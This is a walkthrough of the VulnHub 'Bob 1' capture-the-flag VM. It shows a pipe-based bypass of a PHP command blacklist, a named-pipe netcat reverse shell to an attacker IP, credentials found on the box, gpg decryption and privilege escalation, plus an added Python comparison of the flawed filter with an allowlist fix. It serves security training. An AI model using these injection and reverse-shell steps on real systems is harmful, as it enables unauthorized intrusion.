CTF: Bob 1 – vulnhub CTF walkthrough

VM: https://www.vulnhub.com/entry/bob-1,226/
Author: c0rruptedb1t
Difficulty: Beginner/Intermediate
Privilege Escalation: Intermediate
Target IP: 192.168.75.130

Phase 1: Enumeration

The full-range port scan using nmap discloses three services running with remotely accessible ports:

-> an ftp server running the ProFTPD 1.3.5b daemon
-> an Apache web server running on port 80
-> an ssh daemon running on the uncommon port 25468:
# nmap -O -sT -sV -p- -T5 192.168.75.130
The ftp server doesn’t allow anonymous access and there’s a robots.txt file on the target server, so my summary looked something like this:
Of course, it may seem like a mess to someone else reading it, but overall I started enumerating each linked page on the target as well as the pages listed in the robots.txt file. The dev_shell.php file seemed to be of most interest, and even though it appeared to contain some kind of filter, the simplest way I found to execute a command was to prefix it with echo and a pipe:
echo|cat /etc/passwd
http://192.168.75.130/dev_shell.php

Running dirb with the -X .bak option would additionally disclose some .bak files on the server containing the sources of the PHP files. I got at them more easily by listing the web server directory contents from the dev_shell.php web shell, which shows exactly what kind of filter is used. Also note that the web server front page menu has a z-index of -11, which makes the links inaccessible directly, so I just reverted it to a positive 11 to be able to navigate through the browser. The source code of dev_shell.php.bak:

<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
...
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !== false) {
    system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else {
    $is_he_a_bad_man = explode(' ', trim($command));
    //checks for dangerous commands
    if (in_array($is_he_a_bad_man[0], $bad_words)) {
        system("echo Get out skid lol");
    }
    else {
        system($_POST['in_command']);
    }
}
?>
The above script first checks for a ‘;’ in the command input. If none is found, it splits the input on spaces and compares only the first word against the list of restricted commands, refusing to run it in case of a match. However, a piped command gets executed: the script is vulnerable to command execution via piping because it never checks for a “|” passed to its input, so the first word can be anything harmless while the real command follows the pipe.
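To make the gap concrete, here is an added example (not code from the original post or from the VM) that mirrors the PHP filter’s logic in Python beside an allowlist-based replacement that never hands the input to a shell; the allowlist contents and the argument pattern are assumptions chosen for illustration.

```python
import re
import shlex
import subprocess

# Blacklist copied from the dev_shell.php.bak source shown above.
BAD_WORDS = {"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"}

# Constructed allowlist: programs a maintenance shell might legitimately expose.
ALLOWED_COMMANDS = {"uptime", "date", "df", "hostname"}
# Constructed argument pattern: no shell metacharacters, no whitespace.
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./-]{1,64}$")


def blacklist_allows(command: str) -> bool:
    """Mirror the PHP filter: reject ';', otherwise compare only the first
    space-separated word against BAD_WORDS. Anything else reaches system()."""
    if ";" in command:
        return False
    first_word = command.strip().split(" ")[0]
    return first_word not in BAD_WORDS


def allowlist_argv(command: str):
    """Hardened variant: tokenise with shlex (no shell is involved), require the
    program to be on the allowlist and every argument to match SAFE_ARG.
    Returns the argv list for subprocess.run(shell=False), or None to reject."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    if not all(SAFE_ARG.match(arg) for arg in argv[1:]):
        return None
    return argv


def run_allowlisted(command: str) -> str:
    """Execute only what allowlist_argv() accepts, and never through a shell."""
    argv = allowlist_argv(command)
    if argv is None:
        return "rejected"
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout
```

With the original filter, “echo|cat /etc/passwd” passes because the first word is “echo”; with the allowlist, “echo|cat” is simply not a permitted program and a bare “|” argument fails the pattern, so the pipe never has a shell to act on.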

Phase 2: RCE

To spawn a shell, I used the following commands:
echo|mknod /tmp/backpipe p
echo|/bin/sh 0</tmp/backpipe | /bin/nc 192.168.75.120 443 1>/tmp/backpipe
Getting a shell
The ftp server also seems to be prone to the ProFTPD mod_copy remote command execution (E-DB ID 36803); however, as the DocumentRoot directory belongs to root, trying this as an exploitation vector wouldn’t work, since there isn’t a writable folder on the web server which could be used to store a file and trigger an RCE from there.

Phase 3: Putting together the pieces

From this point it’s all about connecting who said what about whom and who stored what (or where) as a password. While browsing through the /home directory, the first thing that caught my attention was the file theadminisdumb.txt

Password for user jc : Qwerty
Trying to log in as elliot : theadminisdumb would not work; however, logging in to the system as user jc (james) worked out of the box:
User jc
A file named .old_passwordfile.html can be located in user bob’s home directory as well, exposing additional credentials:
Getting credentials for user jc and seb from within bob’s directory
As can be seen from the screenshot, jc has some restrictions placed on his account and is unable to cat files, which can be bypassed by using head, tail or the strings binary. However, as a more convenient surface, it’s better to continue further enumeration using Sebastian’s account.

Phase 4: Privilege Escalation

The privilege escalation on this box is rather easy, as long as you look for something suspicious, out of the regular picture. I keep seeing how most people advise to enumerate configuration files and look for issues (with which of course I agree), but my lesson learned on this box was about privilege escalation: there was a file residing on the server which supposedly should have contained something important, so you have to look for the human element. Once you browse through the directory structure in /home you’d notice the following files in the “Documents” folder of user bob:
Bob’s documents
The file command reports login.txt.gpg as “GPG symmetrically encrypted data (AES cipher)”. A gpg-encrypted file named “login” is definitely something that must contain valuable information, so it has to be looked into thoroughly. Initially I tried cracking the login.txt.gpg passphrase using the tool PGPCrack-NG and the rockyou.txt dictionary and just left it running while doing further enumeration. I didn’t even think it might be stored somewhere in plain text. The tool didn’t seem to find anything even though I left it for hours while looking for proftpd and ssh(d) misconfigurations due to the output of sudo -l. Enumerating user bob’s folder further shows the following content in some text files:
# cat staff.txt
This somehow suggests that the user “bob” is in charge of this server, so getting access with bob’s privileges might be worth trying. Looking at a bash script echoing some commands within the directory discloses the following text:
# cat notes.sh
It doesn’t quite make sense and looks like some random notes from someone bored just talking to himself. The word “Cucumber” seems out of place and I tried it as a possible password on the login.txt.gpg file with no success. At this point I skipped this file, decided it contained nothing useful, and spent hours trying to look into configuration glitches on the server (as mentioned above). However, looking carefully at the whole picture, and especially at the suspicious notes.sh file which is kept in a folder named “Secret”, reveals that the first letters of the sentences actually spell a word:
-= Notes =-
 Harry Potter is my faviorite
 Are you the real me?
 Right, I'm ordering pizza this is going nowhere
 People just don't get me
 Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
 Cucumber
 Rest now your eyes are sleepy
 Are you gonna stop reading this yet?
 Time to fix the server
 Everyone is annoying
 Sticky notes gotta buy em
So the word “HARPOCRATES” (which according to google was the God of silence, secrets and confidentiality) should be either a password for the account Bob or the password required to unlock the file. Trying it as a direct password on user Bob didn’t work:
Trying to login with bob : HARPOCRATES
However, I succeeded in decrypting the login.txt.gpg file using the passphrase “HARPOCRATES” straight out of the box, directly from the shell on the server:
# gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
bob:b0bcat_
Logging in with user bob:b0bcat_
Privilege Escalation on target Bob – PromiseLabs blog, vulnhub CTF walkthrough
And getting the flag:
Getting the flag on target Bob – vulnhub CTF walkthrough by d7x